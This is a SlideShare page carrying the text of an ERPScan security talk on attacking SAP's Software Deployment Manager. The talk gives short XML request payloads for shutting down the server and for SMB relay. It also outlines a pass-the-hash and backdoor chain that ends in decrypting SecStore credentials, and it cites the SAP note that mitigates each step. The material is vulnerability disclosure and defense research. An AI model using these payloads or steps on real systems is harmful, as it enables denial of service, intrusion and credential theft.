SlideShare une entreprise Scribd logo

Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server

ERPScan
ERPScan

SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible. SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner. The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical. The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.

Logiciels
1  sur  52
Télécharger pour lire hors ligne
Invest  in  security   to  secure  investments   Injec&ng  evil  code  in  your  SAP  J2EE   systems:  Security  of  SAP  So<ware   Deployment  Server   Dmitry  Chastukhin.  Director  of  SAP  pentest/ research  team  ERPScan  
About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu&on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presentaDons  key  security  conferences  worldwide   •  25  Awards  and  nominaDons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
SAP                         Вставьте  рисунок  на  слайд,  скруглите  верхний  левый  и  нижний  правый  угол   (Формат  –  Формат  рисунка),  добавьте  контур  (оранжевый,  толщина  –  3)   3   •  The  most  popular  business  applica&on   •  More  than  250000  customers  worldwide     •  83%  Forbes  500  companies  run  SAP   •  Main  system  –  ERP   •  3  Plaporms   -  NetWeaver  ABAP   -  NetWeaver  J2EE   -  BusinessObjects  
SAP  insecurity   Espionage   •  Stealing  financial  informa&on   •  Stealing  corporate  secrets   •  Stealing  supplier  and  customer  lists   •  Stealing  HR  data   Fraud   •  False  transac&ons   •  Modifica&on  of  master  data   Sabotage   •  Denial  of  service   •  Modifica&on  of  financial  reports   •  Access  to  technology  network  (SCADA)  by  trust  rela&ons   4  
5   More  than  2800  in  total   Source:  SAP  Security  in  Figures   0   100   200   300   400   500   600   700   800   900   2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   2014   SAP  vulnerabiliDes  
Is  it  remotely  exploitable?       6   >  5000    non-­‐web  SAP  services  exposed  in  the  world    including  Dispatcher,  Message  Server,  Sap  Host  Control,  etc.     sapscan.com  
What  about  other  services?   0 1 2 3 4 5 6 7 8 9 SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd 7   Source:  SAP  Security  in  Figures  
•  SAP  NetWeaver  ABAP   •  SAP  NetWeaver  J2EE   –  SAP  Portal   –  SAP  Solu&on  Manager     –  SAP  NetWeaver  Development  Infrastracture  (NWDI)   •  SAP  BusinessObjects   •  SAP  HANA  Extended  Applica&on  Services     •  SAP  SUP   •  SAP  Fiori   8   SAP  ApplicaDon  server’s  
•  Design  Time  Repository  (DTR)   •  Component  Build  Service  (CBS)   •  Change  Management  Service  (CMS)   •  So<ware  Landscape  Directory  (SLD)  /  NS   •  So<ware  Deployment  Manager  (SDM)   9   SAP  NetWeaver  development  infrastructure  
          10   SAP  NetWeaver  development  infrastructure  
            11   SAP  NetWeaver  development  infrastructure  
      12   SAP  NetWeaver  development  infrastructure  
    13   SAP  NetWeaver  development  infrastructure  
    14   SAP  NetWeaver  development  infrastructure  
    15   SAP  NetWeaver  development  infrastructure  
So^ware  Deployment  Manager   •  Single  interface  for  the  deployment   •  Deploy  apps  (*.ear,  *.war,  *.sda)   •  Implement  custom  patches   16  
SDM  server   •  Different  server  modes   –  standalone   –  integrated   •  Only  one  user  at  &me   •  Only  hardcoded  admin  user   •  Three  ports:   –  50017  –  Admin  Port   –  50018  –  GUI  Port   –  50019  –  H‚p  Port     17  
SDM  client   •  Browsing  the  distribu&on  of  deployed  components   •  Deploying  and  undeploying   •  Log  viewing   18  
SDM  a_ack  intro   •  SAP  infrastructure  includes  many  Java  services   •  Almost  all  Java  stuff  uses  UME   •  Universal  user  with  a  password   •  Only  one  user  at  a  &me   •  Ability  to  deploy  evil  code  =>  plus,  see  1st  item   19  
SDM  a_ack  intro   •  Thick  client  Java  applica&on  (sad  story)   •  Scarce  communica&ons  se…ngs   •  Difficult  to  intercept   •  Custom  protocols   20  
SDM  a_ack  intro   •  SAP  has  its  own  SAP  Java  Virtual  Machine  (JVM)   •  Java  6  has  A‚ach  API   •  A‚ach  to  another  running  JVM   •  Intercept  and  modify  calls   21  
A_ack  SAP  SDM.  DoS     •  If  a‚acker  uses  an  incorrect  password  3  &mes,  the  server  will   shutdown  automa&cally   •  Also,  if  you  send  this  request,  you  can  shutdown  the  SDM  server   manually:   [10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest> 22  
A_acking  SAP  SDM.  SMB  relay   Packed:     [10 Spaces]<?xml version="1.0"?> <FileAccessRequest f="ip_addrblabla"> </ FileAccessRequest>               An  old  trick,  but  some&mes  it’s  very  useful             23  
PrevenDon   24         •   Install  note  1724516   •   Enable  the  security  features  of  SDM   •   SDM  server  and  SDM  client  need  to  be  updated   h‚ps://websmp205.sap-­‐ag.de/~sapidb/012006153200000493902012E/ SDM_EnablingSecurity.pdf    
From  Nobody  to  Administrator   Now,  I  will  show  an  interes0ng  a2ack   Compromise  Some  SAP  Services     Compromise  SAP  SDM     Compromise  SAP  Server  OS       Compromise  SAP   25  
SDM  authenDcaDon  abuse   •  OK.  Let’s  see  how  authen&ca&on  in  SDM  works:   –  user  enters  password   –  hash  is  calculated  locally  on  client   –  password  hash  is  sent  to  server   –  hash  is  compared  to  hash  from  configura&on  file       Pass  the  hash  a_ack  here!   26  
SDM  authenDcaDon  abuse   RootFrame.class   27  
SDM  authenDcaDon  abuse   …SDMprogramconfigsdmrepository.sdc   28  
SDM  authenDcaDon  abuse   SMDAuthen&catorImpl.class   29  
A_ack  on  SAP  SDM   Read  sdmrepository.sdc       Get  password  hash       Use  hash  as  password  to  authen&cate  on  SDM  server       Deploy  backdoor  on  SAP  Server       PROFIT!       30  
File  read   •   OS  command  execu&on  through  CTC  (Notes  1467771,  1445998  )   •   XML  External  En&&es  (Note  1619539)   •   Directory  Traversal  (Note  1630293  )   •   Through  MMC  file  read  func&on  (Notes    927637  and  1439348)                                                                                                                        We  have  something  new  for  u  J   31  
SAP  Log  Viewer  standalone   •  Open  ports:  26000  (NI),  1099  (RMI),  5465  (Socket)   •  You  can:   –  View  log  on  local  server   –  View  log  on  remote  server   –  Register  file  as  log  file   Read  log  file  without  authenDcaDon!   32  
SAP  Log  Viewer  standalone   A_ack  is  pre_y  easy     Connect  to  LogViewer  standalone  Server       Register  sdmrepository.sdc  file  as  log  file       Read  it       33  
SAP  Log  Viewer  standalone         34  
SAP  Log  Viewer  standalone   When  we  have  a  password  hash,  we  can  use  it  as  password  to   authen&cate  on  SDM  server   35  
SDM  intrusion   Full  info  about  the  SDM  repository   36  
Bypassing  SDM  restricDons   •  Observe  all  server  directories   •  Read  arbitrary  files  via  Log  Viewer   37  
SDM  undeploying   Undeploy  any  applica&on     38  
SDM  backdooring   Deploy  any  applica&on       39  
SDM  backdooring   •  before   •  a<er   40  
SDM  post-­‐exploitaDon       41  
PrevenDon   42         •   Install  Note  1724516,  1685106     •   Enable  the  security  features  of  SDM   •   SDM  server  and  SDM  client  need  to  be  updated   h‚ps://websmp205.sap-­‐ag.de/~sapidb/012006153200000493902012E/ SDM_EnablingSecurity.pdf    
   “The  So=ware  Deployment  Manager  (SDM)  uses  the  database   connec0on  informa0on,  the  J2EE  Engine  administrator  user  and   password  from  the  secure  storage  in  the  file  system,  to  connect   to  the  J2EE  Engine  and  perform  tasks  such  as  so=ware   deployment  and  undeployment”.      h‚p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/ 2e104202795e33e10000000a155106/content.htm   Wow!  J2EE  Engine  administrator  user  and  password   Where  is  all  this  stuff  located?   SAP  SecStore   43  
SAP  SecStore    “By  default,  the  J2EE  Engine  stores  secure  data  in  the  file  usr sap<SID>SYSglobalsecuritydataSecStore.proper0es  in  the   file  system”.      “The  J2EE  Engine  uses  the  SAP  Java  Cryptography  Toolkit  to   encrypt  the  contents  of  the  secure  store  with  the   tripleDES  algorithm”.    h‚p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/ 2e104202795e33e10000000a155106/content.htm     OK.  Let’s  try  to  read  SecStore.proper0es   44  
SAP  SecStore   •  We  can  execute  any  OS  command  (we  have  our  backdoor)   •  We  know  the  SAP  J2EE  Engine  stores  the  database   user  SAP<SID>DB;  its  password  is  here:   usrsap<SID>SYSglobalsecuritydataSecStore.properties •  It’s  all  that  we  need   45  
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ $internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt $internal/mode=encrypted admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E SecStore.properDes   46   But  where  is  the  key?  
Get  the  password   •  We  have  an  encrypted  password   •  We  have  a  key  to  decrypt  it   47   We  got  the  J2EE  admin  and  JDBC   login:password!  
PrevenDon   48       Restrict  read  access  to  files  SecStore.proper0es  and   SecStore.key     h‚p://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/ 14c93ec2f7df6ae10000000a114084/content.htm      
Post-­‐exploitaDon   49  
SDM  hacking  demo   50  
SAP  Guides   It’s  all  in  your  hands   Regular  security  assessments   ABAP  code  review   Monitoring  technical  security   SegregaDon  of  DuDes   Security  events  monitoring   Conclusion   It  is  possible  to  protect  yourself  from  these  kinds  of  issues,     and  we  are  working  close  with  SAP  to  keep  customers  secure  
Future  work   I'd  like  to  thank  SAP's  Product  Security  Response  Team  for  the  great   coopera0on  to  make  SAP  systems  more  secure.  Research  is  always   ongoing,  and  we  can't  share  all  of  it  today.  If  you  want  to  be  the   first   to   see   new   a2acks   and   demos,   follow   us   at   @erpscan   and   a2end  future  presenta0ons:     52   web:  www.erpscan.com         e-­‐mail:  info@erpscan.com,  sales@erpscan.com  

Recommandé

SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM HackingERPScan
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP MobileERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to usERPScan
 

Recommandé

SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM HackingERPScan
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP MobileERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to usERPScan
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 stepsERPScan
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)ERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)ERPScan
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP SecurityPriyanka Aash
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessERPScan
 
Oracle EM12c Release 4 New Features!
Oracle EM12c Release 4 New Features!Oracle EM12c Release 4 New Features!
Oracle EM12c Release 4 New Features!Kellyn Pot'Vin-Gorman
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP securityERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easyERPScan
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects AttacksOnapsis Inc.
 
Dissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksDissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksOnapsis Inc.
 
Sap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatSap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatn|u - The Open Security Community
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit ERPScan
 
Oracle Exadata Management with Oracle Enterprise Manager
Oracle Exadata Management with Oracle Enterprise ManagerOracle Exadata Management with Oracle Enterprise Manager
Oracle Exadata Management with Oracle Enterprise ManagerEnkitec
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis Inc.
 
B&G Guide (Final)
B&G Guide (Final)B&G Guide (Final)
B&G Guide (Final)Ross Higgins
 
Danielle Tronnes 2016 resume
Danielle Tronnes 2016 resumeDanielle Tronnes 2016 resume
Danielle Tronnes 2016 resumeDanielle Tronnes
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)ERPScan
 
Media pembelajaran usaha dan energi
Media pembelajaran usaha dan energiMedia pembelajaran usaha dan energi
Media pembelajaran usaha dan energirahmiyati95
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figuresERPScan
 
Reportes
ReportesReportes
ReportesFiorella Aguilar Isuiza
 

Contenu connexe

Tendances

Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 stepsERPScan
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)ERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)ERPScan
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP SecurityPriyanka Aash
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessERPScan
 
Oracle EM12c Release 4 New Features!
Oracle EM12c Release 4 New Features!Oracle EM12c Release 4 New Features!
Oracle EM12c Release 4 New Features!Kellyn Pot'Vin-Gorman
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP securityERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easyERPScan
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects AttacksOnapsis Inc.
 
Dissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksDissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksOnapsis Inc.
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit ERPScan
 
Oracle Exadata Management with Oracle Enterprise Manager
Oracle Exadata Management with Oracle Enterprise ManagerOracle Exadata Management with Oracle Enterprise Manager
Oracle Exadata Management with Oracle Enterprise ManagerEnkitec
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis Inc.
 

Tendances (14)

Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Security
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
 
Oracle EM12c Release 4 New Features!
Oracle EM12c Release 4 New Features!Oracle EM12c Release 4 New Features!
Oracle EM12c Release 4 New Features!
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects Attacks
 
Dissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksDissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI Frameworks
 
Sap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatSap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hat
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
 
Oracle Exadata Management with Oracle Enterprise Manager
Oracle Exadata Management with Oracle Enterprise ManagerOracle Exadata Management with Oracle Enterprise Manager
Oracle Exadata Management with Oracle Enterprise Manager
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
 

En vedette

Danielle Tronnes 2016 resume
Danielle Tronnes 2016 resumeDanielle Tronnes 2016 resume
Danielle Tronnes 2016 resumeDanielle Tronnes
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)ERPScan
 
Media pembelajaran usaha dan energi
Media pembelajaran usaha dan energiMedia pembelajaran usaha dan energi
Media pembelajaran usaha dan energirahmiyati95
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figuresERPScan
 
Java EE8 - by Kito Mann
Java EE8 - by Kito Mann Java EE8 - by Kito Mann
Java EE8 - by Kito Mann Kile Niklawski
 
Inventory management
Inventory managementInventory management
Inventory managementMonica Blanco
 
jVoiD - the enterprise ecommerce Java by Schogini
jVoiD - the enterprise ecommerce Java by SchoginijVoiD - the enterprise ecommerce Java by Schogini
jVoiD - the enterprise ecommerce Java by SchoginiSchogini Systems Pvt Ltd
 
Self-Diagnosis Hospital Management System
Self-Diagnosis Hospital Management SystemSelf-Diagnosis Hospital Management System
Self-Diagnosis Hospital Management SystemNeelam Priya
 
Introduction to j2 ee frameworks
Introduction to j2 ee frameworksIntroduction to j2 ee frameworks
Introduction to j2 ee frameworksMukesh Kumar
 
Our Tuataras
Our TuatarasOur Tuataras
Our TuatarasCPS_Rm09
 
Java & J2EE Struts with Hibernate Framework
Java & J2EE Struts with Hibernate FrameworkJava & J2EE Struts with Hibernate Framework
Java & J2EE Struts with Hibernate FrameworkMohit Belwal
 
Huge Enterprise Systems Architecture Design with Java EE
Huge Enterprise Systems Architecture Design with Java EEHuge Enterprise Systems Architecture Design with Java EE
Huge Enterprise Systems Architecture Design with Java EERakuten Group, Inc.
 
Material management & Inventory control
Material management & Inventory controlMaterial management & Inventory control
Material management & Inventory controlDushyant Kalchuri
 

En vedette (20)

B&G Guide (Final)
B&G Guide (Final)B&G Guide (Final)
B&G Guide (Final)
 
Danielle Tronnes 2016 resume
Danielle Tronnes 2016 resumeDanielle Tronnes 2016 resume
Danielle Tronnes 2016 resume
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)
 
Media pembelajaran usaha dan energi
Media pembelajaran usaha dan energiMedia pembelajaran usaha dan energi
Media pembelajaran usaha dan energi
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 
Reportes
ReportesReportes
Reportes
 
Outbound Reservation Management System
Outbound Reservation Management System Outbound Reservation Management System
Outbound Reservation Management System
 
Jsf 2 slideshare
Jsf 2 slideshareJsf 2 slideshare
Jsf 2 slideshare
 
Java EE8 - by Kito Mann
Java EE8 - by Kito Mann Java EE8 - by Kito Mann
Java EE8 - by Kito Mann
 
Inventory management
Inventory managementInventory management
Inventory management
 
jVoiD - the enterprise ecommerce Java by Schogini
jVoiD - the enterprise ecommerce Java by SchoginijVoiD - the enterprise ecommerce Java by Schogini
jVoiD - the enterprise ecommerce Java by Schogini
 
Self-Diagnosis Hospital Management System
Self-Diagnosis Hospital Management SystemSelf-Diagnosis Hospital Management System
Self-Diagnosis Hospital Management System
 
Introduction to j2 ee frameworks
Introduction to j2 ee frameworksIntroduction to j2 ee frameworks
Introduction to j2 ee frameworks
 
Our Tuataras
Our TuatarasOur Tuataras
Our Tuataras
 
J2EE Introduction
J2EE IntroductionJ2EE Introduction
J2EE Introduction
 
Java & J2EE Struts with Hibernate Framework
Java & J2EE Struts with Hibernate FrameworkJava & J2EE Struts with Hibernate Framework
Java & J2EE Struts with Hibernate Framework
 
Huge Enterprise Systems Architecture Design with Java EE
Huge Enterprise Systems Architecture Design with Java EEHuge Enterprise Systems Architecture Design with Java EE
Huge Enterprise Systems Architecture Design with Java EE
 
Material management & Inventory control
Material management & Inventory controlMaterial management & Inventory control
Material management & Inventory control
 

Similaire à Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server

SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating ERPScan
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPERPScan
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 stepsERPScan
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsERPScan
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsERPScan
 
Experiences of SOACS
Experiences of SOACSExperiences of SOACS
Experiences of SOACSSimon Haslam
 
Sap basis-transaction-codes
Sap basis-transaction-codesSap basis-transaction-codes
Sap basis-transaction-codesKarthikN157
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and BestPositive Hack Days
 
SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and bestERPScan
 
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSCrea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSAmazon Web Services
 
Device Independent API design
Device Independent API designDevice Independent API design
Device Independent API designAmrita jain
 
A Big Data Lake Based on Spark for BBVA Bank-(Oscar Mendez, STRATIO)
A Big Data Lake Based on Spark for BBVA Bank-(Oscar Mendez, STRATIO)A Big Data Lake Based on Spark for BBVA Bank-(Oscar Mendez, STRATIO)
A Big Data Lake Based on Spark for BBVA Bank-(Oscar Mendez, STRATIO)Spark Summit
 
Putting Private Clouds to Work with PaaS Interop 2013 Vegas Diane Mueller
Putting Private Clouds to Work with PaaS Interop 2013 Vegas Diane MuellerPutting Private Clouds to Work with PaaS Interop 2013 Vegas Diane Mueller
Putting Private Clouds to Work with PaaS Interop 2013 Vegas Diane MuellerOpenShift Origin
 
Putting Private Clouds to Work with PaaS Interop Vegas 2013 presentation by D...
Putting Private Clouds to Work with PaaS Interop Vegas 2013 presentation by D...Putting Private Clouds to Work with PaaS Interop Vegas 2013 presentation by D...
Putting Private Clouds to Work with PaaS Interop Vegas 2013 presentation by D...Diane Mueller
 
SAP Solution Manager - Netweaver on HANA Monitoring Setup Part 1 of 3 (Prepar...
SAP Solution Manager - Netweaver on HANA Monitoring Setup Part 1 of 3 (Prepar...SAP Solution Manager - Netweaver on HANA Monitoring Setup Part 1 of 3 (Prepar...
SAP Solution Manager - Netweaver on HANA Monitoring Setup Part 1 of 3 (Prepar...Linh Nguyen
 
Marriage of ESX and OpenStack - PayPal - VMWorld US 2013
Marriage of ESX and OpenStack - PayPal - VMWorld US 2013Marriage of ESX and OpenStack - PayPal - VMWorld US 2013
Marriage of ESX and OpenStack - PayPal - VMWorld US 2013Scott Carlson
 

Similaire à Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server (20)

SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
 
